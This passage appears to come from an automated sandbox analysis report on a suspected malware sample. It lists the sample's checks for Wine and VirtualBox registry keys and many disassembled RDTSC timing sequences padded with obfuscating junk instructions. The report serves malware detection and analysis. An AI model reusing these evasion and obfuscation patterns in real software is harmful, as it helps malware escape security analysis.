                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 9BEE45 second address: 9BE700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007FA5CCB7DECCh 0x0000000b popad 0x0000000c nop 0x0000000d jmp 00007FA5CCB7DECEh 0x00000012 push dword ptr [ebp+122D0019h] 0x00000018 or dword ptr [ebp+122D1870h], ebx 0x0000001e call dword ptr [ebp+122D265Bh] 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D1870h], esi 0x0000002b xor eax, eax 0x0000002d sub dword ptr [ebp+122D2154h], ebx 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 jmp 00007FA5CCB7DED9h 0x0000003c mov dword ptr [ebp+122D33DDh], eax 0x00000042 pushad 0x00000043 xor dl, FFFFFFB5h 0x00000046 jmp 00007FA5CCB7DECCh 0x0000004b popad 0x0000004c mov esi, 0000003Ch 0x00000051 sub dword ptr [ebp+122D2154h], edx 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jne 00007FA5CCB7DECCh 0x00000061 lodsw 0x00000063 je 00007FA5CCB7DECDh 0x00000069 jnc 00007FA5CCB7DEC7h 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 pushad 0x00000074 add dword ptr [ebp+122D2154h], eax 0x0000007a adc ch, FFFFFFBCh 0x0000007d popad 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 jmp 00007FA5CCB7DED3h 0x00000089 push eax 0x0000008a jng 00007FA5CCB7DED8h 0x00000090 push eax 0x00000091 push edx 0x00000092 je 00007FA5CCB7DEC6h 0x00000098 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2B0F9 second address: B2B0FF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2B639 second address: B2B646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 je 00007FA5CCB7DEC8h 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2B79F second address: B2B804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FA5CCB52639h 0x0000000a jnc 00007FA5CCB52626h 0x00000010 js 00007FA5CCB52626h 0x00000016 popad 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007FA5CCB52635h 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jno 00007FA5CCB5263Bh 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2B804 second address: B2B80D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2B933 second address: B2B93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2B93D second address: B2B941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2DF7F second address: B2E00A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA5CCB52626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA5CCB5262Ah 0x00000010 jnp 00007FA5CCB52626h 0x00000016 popad 0x00000017 popad 0x00000018 add dword ptr [esp], 4985A972h 0x0000001f sbb edi, 127BE68Ch 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D17BBh], edi 0x0000002c cmc 0x0000002d popad 0x0000002e push 00000003h 0x00000030 add dword ptr [ebp+122D1870h], ecx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007FA5CCB52628h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 0000001Dh 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jmp 00007FA5CCB52632h 0x00000057 push 00000003h 0x00000059 add esi, dword ptr [ebp+122D267Eh] 0x0000005f push 8A6C0093h 0x00000064 push ecx 0x00000065 pushad 0x00000066 jns 00007FA5CCB52626h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E106 second address: B2E10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E10A second address: B2E10F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E10F second address: B2E11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E11F second address: B2E135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA5CCB5262Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E135 second address: B2E213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FA5CCB7DED0h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007FA5CCB7DED0h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jmp 00007FA5CCB7DED0h 0x0000001f pop eax 0x00000020 call 00007FA5CCB7DED5h 0x00000025 mov esi, dword ptr [ebp+122D360Dh] 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e mov edi, dword ptr [ebp+122D1F3Dh] 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 mov dword ptr [ebp+122D1BF6h], ebx 0x0000003d pop edx 0x0000003e push 00000003h 0x00000040 jnp 00007FA5CCB7DEC9h 0x00000046 movzx edx, cx 0x00000049 call 00007FA5CCB7DEC9h 0x0000004e push edi 0x0000004f jmp 00007FA5CCB7DECEh 0x00000054 pop edi 0x00000055 push eax 0x00000056 push esi 0x00000057 jmp 00007FA5CCB7DECDh 0x0000005c pop esi 0x0000005d mov eax, dword ptr [esp+04h] 0x00000061 jnp 00007FA5CCB7DED2h 0x00000067 jp 00007FA5CCB7DECCh 0x0000006d mov eax, dword ptr [eax] 0x0000006f jmp 00007FA5CCB7DED6h 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 push ebx 0x00000079 push eax 0x0000007a push edx 0x0000007b jp 00007FA5CCB7DEC6h 0x00000081 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E213 second address: B2E272 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FA5CCB52628h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007FA5CCB5262Dh 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D2383h], ebx 0x0000002e mov dword ptr [ebp+122D22BAh], edi 0x00000034 popad 0x00000035 pop edx 0x00000036 lea ebx, dword ptr [ebp+12442E53h] 0x0000003c or dword ptr [ebp+122D2097h], edi 0x00000042 push eax 0x00000043 push ebx 0x00000044 jc 00007FA5CCB5262Ch 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E36C second address: B2E385 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E385 second address: B2E38F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA5CCB52626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E38F second address: B2E40E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA5CCB7DED5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FA5CCB7DEC8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D1F1Dh], ebx 0x0000002b push 00000003h 0x0000002d mov di, si 0x00000030 push 00000000h 0x00000032 call 00007FA5CCB7DECFh 0x00000037 mov edi, dword ptr [ebp+122D33E9h] 0x0000003d pop esi 0x0000003e mov dword ptr [ebp+122D237Eh], ebx 0x00000044 push 00000003h 0x00000046 mov esi, dword ptr [ebp+122D17C0h] 0x0000004c mov esi, dword ptr [ebp+122D3571h] 0x00000052 push A68CC8A4h 0x00000057 push edx 0x00000058 pushad 0x00000059 jno 00007FA5CCB7DEC6h 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E40E second address: B2E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 xor dword ptr [esp], 668CC8A4h 0x0000000d mov dword ptr [ebp+122D23ACh], edi 0x00000013 lea ebx, dword ptr [ebp+12442E5Eh] 0x00000019 mov dx, 5C8Bh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FA5CCB52631h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2E443 second address: B2E45D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B1EB38 second address: B1EB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA5CCB52626h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B1EB42 second address: B1EB48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B1EB48 second address: B1EB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B1EB50 second address: B1EB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B1EB54 second address: B1EB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA5CCB52626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007FA5CCB52626h 0x00000017 jmp 00007FA5CCB5262Bh 0x0000001c popad 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B1EB77 second address: B1EB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C61C second address: B4C620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C620 second address: B4C626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C626 second address: B4C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FA5CCB52637h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FA5CCB52626h 0x0000001a jno 00007FA5CCB52626h 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C658 second address: B4C65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C7C4 second address: B4C7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52637h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C7DF second address: B4C7E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA5CCB7DECCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C7E9 second address: B4C81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB52635h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d jmp 00007FA5CCB5262Fh 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C95D second address: B4C963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C963 second address: B4C988 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007FA5CCB52633h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C988 second address: B4C9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB7DED5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4C9A6 second address: B4C9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4CC98 second address: B4CCAF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007FA5CCB7DEC6h 0x00000009 js 00007FA5CCB7DEC6h 0x0000000f pop edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4CF85 second address: B4CF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4CF8B second address: B4CF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4D0BE second address: B4D0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA5CCB52631h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4D23A second address: B4D247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007FA5CCB7DEC6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4D247 second address: B4D27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB52636h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA5CCB52638h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4D415 second address: B4D419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4D419 second address: B4D41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4D41F second address: B4D429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B4D429 second address: B4D438 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA5CCB52626h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B50367 second address: B5036B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B514EE second address: B514FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB5262Ah 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B51683 second address: B5168D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA5CCB7DEC6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5168D second address: B51691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B2207C second address: B220A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FA5CCB7DEC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push edi 0x0000000e jmp 00007FA5CCB7DED2h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007FA5CCB7DEC6h 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B220A4 second address: B220AE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA5CCB52626h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B59175 second address: B5917B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B254DD second address: B254EB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA5CCB52626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B254EB second address: B254F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B58E60 second address: B58E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5C523 second address: B5C527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5C527 second address: B5C53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA5CCB5262Bh 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5CB26 second address: B5CB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5CB2C second address: B5CB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5D2E6 second address: B5D335 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA5CCB7DEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b xchg eax, ebx 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FA5CCB7DEC8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007FA5CCB7DED8h 0x0000002b nop 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5D900 second address: B5D94E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx edi, bx 0x0000000c xchg eax, ebx 0x0000000d jno 00007FA5CCB52645h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA5CCB52639h 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5DF12 second address: B5DF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5DF1F second address: B5DF3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5DF3C second address: B5DF59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB7DED9h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5E7EF second address: B5E7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5E66A second address: B5E674 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA5CCB7DEC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5E674 second address: B5E682 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5F6A5 second address: B5F6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA5CCB7DEC6h 0x0000000a popad 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5F6B0 second address: B5F71D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA5CCB52632h 0x00000008 jmp 00007FA5CCB5262Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cmc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FA5CCB52628h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D1C77h], esi 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 jmp 00007FA5CCB52636h 0x0000003d mov cx, 87F9h 0x00000041 popad 0x00000042 mov dword ptr [ebp+122D23B7h], esi 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
